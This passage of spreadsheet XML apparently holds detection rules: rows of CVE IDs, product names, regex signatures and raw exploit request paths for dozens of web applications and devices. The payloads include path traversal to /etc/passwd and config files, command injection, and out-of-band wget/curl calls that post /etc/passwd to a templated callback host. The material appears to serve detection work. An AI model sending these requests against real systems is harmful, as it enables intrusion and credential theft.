    <t>.*?(?:/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd).*</t>
  </si>
  <si>
    <t>/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd</t>
  </si>
  <si>
    <t>TIBCO JasperReports Library</t>
  </si>
  <si>
    <t>CVE-2018-18809</t>
  </si>
  <si>
    <t>.*?(?:/jasperserver-pro/reportresource/reportresource/\?resource=net/sf/jasperreports/\.\./\.\./\.\./\.\./js\.jdbc\.properties).*</t>
  </si>
  <si>
    <t>/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties</t>
  </si>
  <si>
    <t>Wowza Streaming Engine Manager</t>
  </si>
  <si>
    <t>CVE-2018-19365</t>
  </si>
  <si>
    <t>.*?(?:/enginemanager/server/logs/download\?logType=error&amp;logName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;logSource=engine).*</t>
  </si>
  <si>
    <t>/enginemanager/server/logs/download?logType=error&amp;logName=../../../../../../../../etc/passwd&amp;logSource=engine</t>
  </si>
  <si>
    <t>CVE-2019-19781</t>
  </si>
  <si>
    <t>.*?(?:/vpn/\.\./vpns/cfg/smb\.conf).*</t>
  </si>
  <si>
    <t>/vpn/../vpns/cfg/smb.conf</t>
  </si>
  <si>
    <t>Cartadis Gespage</t>
  </si>
  <si>
    <t>CVE-2021-33807</t>
  </si>
  <si>
    <t>.*?(?:/gespage/doDownloadData\?file_name=\.\./\.\./\.\./\.\./\.\./Windows/debug/NetSetup\.log).*</t>
  </si>
  <si>
    <t>/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log</t>
  </si>
  <si>
    <t>Galera WebTemplate Directory Traversal</t>
  </si>
  <si>
    <t>CVE-2021-40960</t>
  </si>
  <si>
    <t>.*?(?:/GallerySite/filesrc/fotoilan/388/middle//\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/etc/passwd).*</t>
  </si>
  <si>
    <t>/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd</t>
  </si>
  <si>
    <t>Payara Micro Community Directory Traversal</t>
  </si>
  <si>
    <t>CVE-2021-41381</t>
  </si>
  <si>
    <t>.*?(?:/\.//WEB-INF/classes/META-INF/microprofile-config\.properties).*</t>
  </si>
  <si>
    <t>/.//WEB-INF/classes/META-INF/microprofile-config.properties</t>
  </si>
  <si>
    <t>CVE-2021-21234</t>
  </si>
  <si>
    <t>.*?(?:/manage/log/view\?filename=/windows/win\.ini&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./|/manage/log/view\?filename=/etc/passwd&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./|/log/view\?filename=/windows/win\.ini&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./|/log/view\?filename=/etc/passwd&amp;base=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./).*</t>
  </si>
  <si>
    <t>/log/view?filename=/etc/passwd&amp;base=../../../../../../../../../../|/manage/log/view?filename=/etc/passwd&amp;base=../../../../../../../../../../|/log/view?filename=/windows/win.ini&amp;base=../../../../../../../../../../|/manage/log/view?filename=/windows/win.ini&amp;base=../../../../../../../../../../</t>
  </si>
  <si>
    <t>ffay lanproxy</t>
  </si>
  <si>
    <t>CVE-2021-3019</t>
  </si>
  <si>
    <t>.*?(?:/\.\./conf/config\.properties).*</t>
  </si>
  <si>
    <t>/../conf/config.properties</t>
  </si>
  <si>
    <t>Copyparty</t>
  </si>
  <si>
    <t>CVE-2023-37474</t>
  </si>
  <si>
    <t>.*?(?:/\.cpr/%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>/.cpr/%2Fetc%2Fpasswd</t>
  </si>
  <si>
    <t>FileMage Gateway</t>
  </si>
  <si>
    <t>CVE-2023-39026</t>
  </si>
  <si>
    <t>.*?(?:/mgmnt/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cwindows%5cwin\.ini).*</t>
  </si>
  <si>
    <t>/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini</t>
  </si>
  <si>
    <t>FortiWLM</t>
  </si>
  <si>
    <t>CVE-2023-34990</t>
  </si>
  <si>
    <t>.*?(?:/ems/cgi-bin/ezrf_lighttpd\.cgi\?op_type=upgradelogs&amp;imagename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./data/apps/nms/logs/httpd_error_log).*</t>
  </si>
  <si>
    <t>/wlm/login?next=/wlm|/ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&amp;imagename=../../../../../../../../../data/apps/nms/logs/httpd_error_log</t>
  </si>
  <si>
    <t>JFinalCMS</t>
  </si>
  <si>
    <t>CVE-2023-41599</t>
  </si>
  <si>
    <t>.*?(?:/common/down/file\?filekey=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/common/down/file?filekey=/../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Nodogsplash</t>
  </si>
  <si>
    <t>CVE-2023-39120</t>
  </si>
  <si>
    <t>.*?(?:/\.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash).*</t>
  </si>
  <si>
    <t>/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash</t>
  </si>
  <si>
    <t>CVE-2023-27640</t>
  </si>
  <si>
    <t>.*?(?:/tshirtecommerce/fonts\.php\?name=2&amp;type=\./\.\./index\.php).*</t>
  </si>
  <si>
    <t>/tshirtecommerce/fonts.php?name=2&amp;type=./../index.php</t>
  </si>
  <si>
    <t>SolarWinds Serv</t>
  </si>
  <si>
    <t>CVE-2024-28995</t>
  </si>
  <si>
    <t>.*?(?:/\?InternalDir=/\.\./\.\./\.\./\.\./windows&amp;InternalFile=win\.ini|/\?InternalDir=.\..\..\..\.etc&amp;InternalFile=passwd).*</t>
  </si>
  <si>
    <t>/?InternalDir=/../../../../windows&amp;InternalFile=win.ini|/?InternalDir=\..\..\..\..\etc&amp;InternalFile=passwd</t>
  </si>
  <si>
    <t>Personal Weather Station Dashboard</t>
  </si>
  <si>
    <t>CVE-2025-47423</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/others/_test\.php\?test=\.\./\.\./\.\./apache/conf/ssl\.key/server\.key </t>
  </si>
  <si>
    <t>/others/_test.php?test=../../../apache/conf/ssl.key/server.key|/</t>
  </si>
  <si>
    <t>mojoPortal</t>
  </si>
  <si>
    <t>CVE-2025-28367</t>
  </si>
  <si>
    <t>.*?(?:/api/BetterImageGallery/imagehandler\?path=\.\./\.\./\.\./Web\.Config).*</t>
  </si>
  <si>
    <t>/api/BetterImageGallery/imagehandler?path=../../../Web.Config</t>
  </si>
  <si>
    <t>Voyager</t>
  </si>
  <si>
    <t>.*?(?:/admin/voyager-assets\?path=\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2F\.\.\.\.\.%2F%2F%2Fetc/passwd).*</t>
  </si>
  <si>
    <t>/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd</t>
  </si>
  <si>
    <t>Belkin N Router</t>
  </si>
  <si>
    <t>路径遍历</t>
  </si>
  <si>
    <t>CVE-2014-2962</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/webproc\?getpage=/etc/passwd&amp;var:page=deviceinfo).*</t>
  </si>
  <si>
    <t>/cgi-bin/webproc?getpage=/etc/passwd&amp;var:page=deviceinfo</t>
  </si>
  <si>
    <t>Oracle Business Intelligence</t>
  </si>
  <si>
    <t>CVE-2019-2588</t>
  </si>
  <si>
    <t>.*?(?:/xmlpserver/servlet/adfresource\?format=aaaaaaaaaaaaaaa&amp;documentId=\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5CWindows%5Cwin\.ini).*</t>
  </si>
  <si>
    <t>/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&amp;documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini</t>
  </si>
  <si>
    <t>GLPI plugin Barcode</t>
  </si>
  <si>
    <t>CVE-2021-43778</t>
  </si>
  <si>
    <t>.*?(?:/glpi/plugins/barcode/front/send\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>GhostCMS</t>
  </si>
  <si>
    <t>CVE-2023-32235</t>
  </si>
  <si>
    <t>.*?(?:/assets/built%2F\.\.%2F\.\.%2F%E0%A4%A/package\.json|/assets/built%2F\.\.%2F\.\.%2F/package\.json).*</t>
  </si>
  <si>
    <t>/assets/built%2F..%2F..%2F%E0%A4%A/package.json|/assets/built%2F..%2F..%2F/package.json</t>
  </si>
  <si>
    <t xml:space="preserve">MLflow </t>
  </si>
  <si>
    <t>CVE-2023-3765</t>
  </si>
  <si>
    <t>.*?(?:/ajax-api/2\.0/mlflow-artifacts/artifacts\?path=C:/).*</t>
  </si>
  <si>
    <t>/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/</t>
  </si>
  <si>
    <t>PaperCut</t>
  </si>
  <si>
    <t>CVE-2023-39143</t>
  </si>
  <si>
    <t>.*?(?:/custom-report-example/\.\..\..\.deploymentsharpiconshome-app\.png).*</t>
  </si>
  <si>
    <t>/custom-report-example/..\..\..\deployment\sharp\icons\home-app.png</t>
  </si>
  <si>
    <t>Qlik Sense Enterprise</t>
  </si>
  <si>
    <t>CVE-2023-41266</t>
  </si>
  <si>
    <t>.*?(?:/resources/qmc/fonts/\.\./\.\./\.\./qrs/ReloadTask\?xrfkey=1333333333333337&amp;filter=\.ttf).*</t>
  </si>
  <si>
    <t>/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&amp;filter=.ttf</t>
  </si>
  <si>
    <t>ZKTeco BioTime</t>
  </si>
  <si>
    <t>CVE-2023-38950</t>
  </si>
  <si>
    <t>.*?(?:/iclock/file\?url=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini).*</t>
  </si>
  <si>
    <t>/iclock/file?url=/../../../../../../../../../windows/win.ini</t>
  </si>
  <si>
    <t>CVE-2023-38879</t>
  </si>
  <si>
    <t>.*?(?:/DownloadWindow\.php\?filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/DownloadWindow.php?filename=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CData API Server</t>
  </si>
  <si>
    <t>CVE-2024-31848</t>
  </si>
  <si>
    <t>.*?(?:/ui/\.\.srcgetSettings\.rsb\?@json|/login\.rst).*</t>
  </si>
  <si>
    <t>/login.rst|/ui/..\src\getSettings.rsb?@json</t>
  </si>
  <si>
    <t>FastAdmin</t>
  </si>
  <si>
    <t>CVE-2024-7928</t>
  </si>
  <si>
    <t>.*?(?:/index/ajax/lang\?lang=\.\./\.\./application/database).*</t>
  </si>
  <si>
    <t>/index/ajax/lang?lang=../../application/database</t>
  </si>
  <si>
    <t>Oracle Retail Xstore Suite</t>
  </si>
  <si>
    <t>CVE-2024-21136</t>
  </si>
  <si>
    <t>.*?(?:/xstoremgwt/cheetahImages\?imageId=\.\..\..\..\.windowswin\.ini).*</t>
  </si>
  <si>
    <t>/xstoremgwt/cheetahImages?imageId=..\..\..\..\windows\win.ini</t>
  </si>
  <si>
    <t>Sante PACS Server</t>
  </si>
  <si>
    <t>CVE-2025-2264</t>
  </si>
  <si>
    <t>.*?(?:/assets/\.\./\.\./\.HTTP/HTTP\.db).*</t>
  </si>
  <si>
    <t>/assets/../../.HTTP/HTTP.db</t>
  </si>
  <si>
    <t>Yeswiki</t>
  </si>
  <si>
    <t>CVE-2025-31131</t>
  </si>
  <si>
    <t>.*?(?:/\?UrkCEO/edit&amp;theme=margot&amp;squelette=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd&amp;style=margot\.css).*</t>
  </si>
  <si>
    <t>/?UrkCEO/edit&amp;theme=margot&amp;squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&amp;style=margot.css</t>
  </si>
  <si>
    <t>Alibaba Anyproxy</t>
  </si>
  <si>
    <t>.*?(?:/fetchBody\?id=1/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/fetchBody?id=1/../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Oracle Fatwire</t>
  </si>
  <si>
    <t>.*?(?:/cs/career/getSurvey\.jsp\?fn=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Seagate BlackArmor NAS</t>
  </si>
  <si>
    <t>命令注入</t>
  </si>
  <si>
    <t>CVE-2014-3206</t>
  </si>
  <si>
    <t>.*?(?:/backupmgt/pre_connect_check\.php\?auth_name=fail;wget\+http://.*?;|/backupmgt/localJob\.php\?session=fail;wget\+http://.*?;).*</t>
  </si>
  <si>
    <t>/backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}};|/backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}};</t>
  </si>
  <si>
    <t>Trixbox</t>
  </si>
  <si>
    <t>CVE-2017-14535</t>
  </si>
  <si>
    <t>.*?(?:/maint/modules/home/index\.php\?lang=english\|cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/maint/modules/home/index.php?lang=english|cat%20/etc/passwd</t>
  </si>
  <si>
    <t>Jenkins</t>
  </si>
  <si>
    <t>CVE-2018-1000861</t>
  </si>
  <si>
    <t>.*?(?:/securityRealm/user/admin/descriptorByName/org\.jenkinsci\.plugins\.workflow\.cps\.CpsFlowDefinition/checkScriptCompile\?value=@GrabConfig\(disableChecksums=true\)%0a@GrabResolver\(name=%27test%27,%20root=%27http://aaa%27\)%0a@Grab\(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27\)%0aimport%20Payload;).*</t>
  </si>
  <si>
    <t>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;</t>
  </si>
  <si>
    <t>Yachtcontrol Webapplication</t>
  </si>
  <si>
    <t>CVE-2019-17270</t>
  </si>
  <si>
    <t>.*?(?:/pages/systemcall\.php\?command=cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/pages/systemcall.php?command=cat%20/etc/passwd</t>
  </si>
  <si>
    <t>WAVLINK WN live_api</t>
  </si>
  <si>
    <t>CVE-2020-12124</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/live_api\.cgi\?page=.*?&amp;id=.*?&amp;ip=;id;).*</t>
  </si>
  <si>
    <t>/cgi-bin/live_api.cgi?page={{str}}&amp;id={{num}}&amp;ip=;id;</t>
  </si>
  <si>
    <t>CVE-2020-29390</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/kerbynet\?Action=StartSessionSubmit&amp;User=%27%26cat%20/etc/passwd%26%27&amp;PW=).*</t>
  </si>
  <si>
    <t>/cgi-bin/kerbynet?Action=StartSessionSubmit&amp;User=%27%26cat%20/etc/passwd%26%27&amp;PW=</t>
  </si>
  <si>
    <t>Geutebruck</t>
  </si>
  <si>
    <t>CVE-2021-33544</t>
  </si>
  <si>
    <t>.*?(?://uapi-cgi/certmngr\.cgi\?action=createselfcert&amp;local=anything&amp;country=AA&amp;state=%24\(wget%20http://.*?\)&amp;organization=anything&amp;organizationunit=anything&amp;commonname=anything&amp;days=1&amp;type=anything).*</t>
  </si>
  <si>
    <t>//uapi-cgi/certmngr.cgi?action=createselfcert&amp;local=anything&amp;country=AA&amp;state=%24(wget%20http://{{interactsh-url}})&amp;organization=anything&amp;organizationunit=anything&amp;commonname=anything&amp;days=1&amp;type=anything</t>
  </si>
  <si>
    <t>Node System Information Library</t>
  </si>
  <si>
    <t>CVE-2021-21315</t>
  </si>
  <si>
    <t>.*?(?:/api/getServices\?name\[\]=\$\(wget%20--post-file%20/etc/passwd%20.*?\)).*</t>
  </si>
  <si>
    <t>/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})</t>
  </si>
  <si>
    <t>YeaLink DM</t>
  </si>
  <si>
    <t>CVE-2021-27561</t>
  </si>
  <si>
    <t>.*?(?:/premise/front/getPingData\?url=http://0\.0\.0\.0:9600/sm/api/v1/firewall/zone/services\?zone=;/usr/bin/id;).*</t>
  </si>
  <si>
    <t>/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;</t>
  </si>
  <si>
    <t>Atlassian Bitbucket</t>
  </si>
  <si>
    <t>CVE-2022-36804</t>
  </si>
  <si>
    <t>.*?(?:/rest/api/latest/projects/.*?/repos/.*?/archive\?filename=.*?&amp;at=.*?&amp;path=.*?&amp;prefix=ax%00--exec=%60id%60%00--remote=origin|/rest/api/latest/repos).*</t>
  </si>
  <si>
    <t>/rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&amp;at={{data}}&amp;path={{data}}&amp;prefix=ax%00--exec=%60id%60%00--remote=origin|/rest/api/latest/repos</t>
  </si>
  <si>
    <t>Cacti</t>
  </si>
  <si>
    <t>CVE-2022-46169</t>
  </si>
  <si>
    <t>.*?(?:/remote_agent\.php\?action=polldata&amp;local_data_ids\[0\]=1&amp;host_id=1&amp;poller_id=;curl%20.*?%20-H%20'User-Agent%3a%20.*?';).*</t>
  </si>
  <si>
    <t>/remote_agent.php?action=polldata&amp;local_data_ids[0]=1&amp;host_id=1&amp;poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}';</t>
  </si>
  <si>
    <t>MajorDoMo thumb</t>
  </si>
  <si>
    <t>CVE-2023-50917</t>
  </si>
  <si>
    <t>.*?(?:/modules/thumb/thumb\.php\?url=cnRzcDovL2EK&amp;debug=1&amp;transport=%7C%7C\+%28echo\+%27%5BS%5D%27%3B\+id%3B\+echo\+%27%5BE%5D%27%29%23%3B).*</t>
  </si>
  <si>
    <t>/modules/thumb/thumb.php?url=cnRzcDovL2EK&amp;debug=1&amp;transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B</t>
  </si>
  <si>
    <t>Cacti cmd_realtime</t>
  </si>
  <si>
    <t>CVE-2024-29895</t>
  </si>
  <si>
    <t>.*?(?:/cacti/cmd_realtime\.php\?1\+1&amp;&amp;curl%20.*?\+1\+1\+1).*</t>
  </si>
  <si>
    <t>/cacti/cmd_realtime.php?1+1&amp;&amp;curl%20{{interactsh-url}}+1+1+1</t>
  </si>
  <si>
    <t>DrayTek Vigor</t>
  </si>
  <si>
    <t>CVE-2024-12987</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/mainfunction\.cgi/apmcfgupload\?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0\.%52\$c%52\$ccurl\$\{IFS\}.*?|/cgi-bin/mainfunction\.cgi/apmcfgupload\?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0\.%52\$c%52\$ccat\$\{IFS\}/etc/passwd).*</t>
  </si>
  <si>
    <t>/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}{{interactsh-url}}|/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd</t>
  </si>
  <si>
    <t>Progress Kemp Flowmon</t>
  </si>
  <si>
    <t>CVE-2024-2389</t>
  </si>
  <si>
    <t>.*?(?:/service\.pdfs/confluence\?lang=en&amp;file=`curl\+.*?`).*</t>
  </si>
  <si>
    <t>/service.pdfs/confluence?lang=en&amp;file=`curl+{{interactsh-url}}`</t>
  </si>
  <si>
    <t>Raisecom</t>
  </si>
  <si>
    <t>CVE-2024-7120</t>
  </si>
  <si>
    <t>.*?(?:/vpn/list_base_config\.php\?type=mod&amp;parts=base_config&amp;template=%60echo%20-e%20%27.*?%27%3E%20%2Fwww%2Ftmp%2Finfo\.html%60).*</t>
  </si>
  <si>
    <t>/vpn/list_base_config.php?type=mod&amp;parts=base_config&amp;template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60|/tmp/info.html</t>
  </si>
  <si>
    <t>Palo Alto Networks Expedition</t>
  </si>
  <si>
    <t>CVE-2025-0107</t>
  </si>
  <si>
    <t>.*?(?:/API/regionsDiscovery\.php\?master=spark%3A%2F%2F.*?:443&amp;mask=26&amp;project=your_project&amp;devices=device1%2Cdevice2&amp;mtserver=127\.0\.0\.1%3A3306&amp;mtuser=root&amp;mtpassword=paloalto&amp;task-id=1193&amp;mode=pre-analysis&amp;regions=&amp;parquetPath=%2Ftmp&amp;timezone=Europe%2FHelsinki&amp;mlserver=127\.0\.0\.1&amp;debug=false&amp;initDate=2023-01-01&amp;endDate=2023-01-31).*</t>
  </si>
  <si>
    <t>/API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&amp;mask=26&amp;project=your_project&amp;devices=device1%2Cdevice2&amp;mtserver=127.0.0.1%3A3306&amp;mtuser=root&amp;mtpassword=paloalto&amp;task-id=1193&amp;mode=pre-analysis&amp;regions=&amp;parquetPath=%2Ftmp&amp;timezone=Europe%2FHelsinki&amp;mlserver=127.0.0.1&amp;debug=false&amp;initDate=2023-01-01&amp;endDate=2023-01-31</t>
  </si>
  <si>
    <t>Symfony</t>
  </si>
  <si>
    <t>未授权访问</t>
  </si>
  <si>
    <t>CVE-2015-4050</t>
  </si>
  <si>
    <t>.*?(?:/_fragment\?_path=_controller=phpcredits&amp;flag=-1).*</t>
  </si>
  <si>
    <t>/_fragment?_path=_controller=phpcredits&amp;flag=-1</t>
  </si>
  <si>
    <t>Trend Micro Threat Discovery Appliance</t>
  </si>
  <si>
    <t>CVE-2016-7552</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/logoff\.cgi).*</t>
  </si>
  <si>
    <t>/cgi-bin/logoff.cgi</t>
  </si>
  <si>
    <t>CVE-2017-5521</t>
  </si>
  <si>
    <t>.*?(?:/passwordrecovered\.cgi\?id=.*?).*</t>
  </si>
  <si>
    <t>/passwordrecovered.cgi?id={{rand_base(5)}}</t>
  </si>
  <si>
    <t>Intelbras NPLUG</t>
  </si>
  <si>
    <t>CVE-2018-12455</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/DownloadCfg/RouterCfm\.cfg).*</t>
  </si>
  <si>
    <t>/cgi-bin/DownloadCfg/RouterCfm.cfg</t>
  </si>
  <si>
    <t>Kubernetes Dashboard</t>
  </si>
  <si>
    <t>CVE-2018-18264</t>
  </si>
  <si>
    <t>.*?(?:/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs|/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs).*</t>
  </si>
  <si>
    <t>/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs|/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs</t>
  </si>
  <si>
    <t>CVE-2018-3810</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/options-general\.php\?page=smartcode).*</t>
  </si>
  <si>
    <t>/wp-admin/options-general.php?page=smartcode</t>
  </si>
  <si>
    <t>ThinVNC</t>
  </si>
  <si>
    <t>CVE-2019-17662</t>
  </si>
  <si>
    <t>.*?(?:/.*?/\.\./\.\./ThinVnc\.ini).*</t>
  </si>
  <si>
    <t>/{{randstr}}/../../ThinVnc.ini</t>
  </si>
  <si>
    <t>Oracle iPlanet Web Server</t>
  </si>
  <si>
    <t>CVE-2020-9315</t>
  </si>
  <si>
    <t>.*?(?:/admingui/version/serverConfigurationsGeneral\?serverConfigurationsGeneral\.GeneralWebserverTabs\.TabHref=4|/admingui/version/serverTasksGeneral\?serverTasksGeneral\.GeneralWebserverTabs\.TabHref=2).*</t>
  </si>
  <si>
    <t>/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2|/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4</t>
  </si>
  <si>
    <t>MSNSwitch Firmware MNT</t>
  </si>
  <si>
    <t>CVE-2022-32429</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin-hax/ExportSettings\.sh).*</t>
  </si>
  <si>
    <t>/cgi-bin-hax/ExportSettings.sh</t>
  </si>
  <si>
    <t>Powertek Firmware</t>
  </si>
  <si>
    <t>CVE-2022-33174</t>
  </si>
  <si>
    <t>.*?(?:/cgi/get_param\.cgi\?xml&amp;sys\.passwd&amp;sys\.su\.name).*</t>
  </si>
  <si>
    <t>/cgi/get_param.cgi?xml&amp;sys.passwd&amp;sys.su.name</t>
  </si>
  <si>
    <t>Tenda AC V</t>
  </si>
  <si>
    <t>CVE-2022-40843</t>
  </si>
  <si>
    <t>.*?(?:/goform/downloadSyslog/syslog\.log).*</t>
  </si>
  <si>
    <t>/goform/downloadSyslog/syslog.log</t>
  </si>
  <si>
    <t>Zyxel</t>
  </si>
  <si>
    <t>CVE-2022-0342</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/export-cgi\?category=config&amp;arg0=startup-config\.conf).*</t>
  </si>
  <si>
    <t>/cgi-bin/export-cgi?category=config&amp;arg0=startup-config.conf</t>
  </si>
  <si>
    <t>Adobe Coldfusion</t>
  </si>
  <si>
    <t>CVE-2023-26347</t>
  </si>
  <si>
    <t>.*?(?:/hax/\.\.CFIDE/adminapi/administrator\.cfc\?method=getBuildNumber&amp;_cfclient=true).*</t>
  </si>
  <si>
    <t>/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&amp;_cfclient=true</t>
  </si>
  <si>
    <t>Ivanti ICS</t>
  </si>
  <si>
    <t>CVE-2023-46805</t>
  </si>
  <si>
    <t>.*?(?:/api/v1/totp/user-backup-code/\.\./\.\./system/system-information|/api/v1/cav/client/status/\.\./\.\./admin/options).*</t>
  </si>
  <si>
    <t>/api/v1/cav/client/status/../../admin/options|/api/v1/totp/user-backup-code/../../system/system-information</t>
  </si>
  <si>
    <t>Openfire Administration Console</t>
  </si>
  <si>
    <t>CVE-2023-32315</t>
  </si>
  <si>
    <t>.*?(?:/setup/setup-s/%u002e%u002e/%u002e%u002e/log\.jsp).*</t>
  </si>
  <si>
    <t>/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp</t>
  </si>
  <si>
    <t>Strapi Versions</t>
  </si>
  <si>
    <t>CVE-2023-22893</t>
  </si>
  <si>
    <t>.*?(?:/api/auth/cognito/callback\?access_token=.*?&amp;id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0\..*?\.).*</t>
  </si>
  <si>
    <t>/api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&amp;id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}.</t>
  </si>
  <si>
    <t>Crypto</t>
  </si>
  <si>
    <t>CVE-2024-9989</t>
  </si>
  <si>
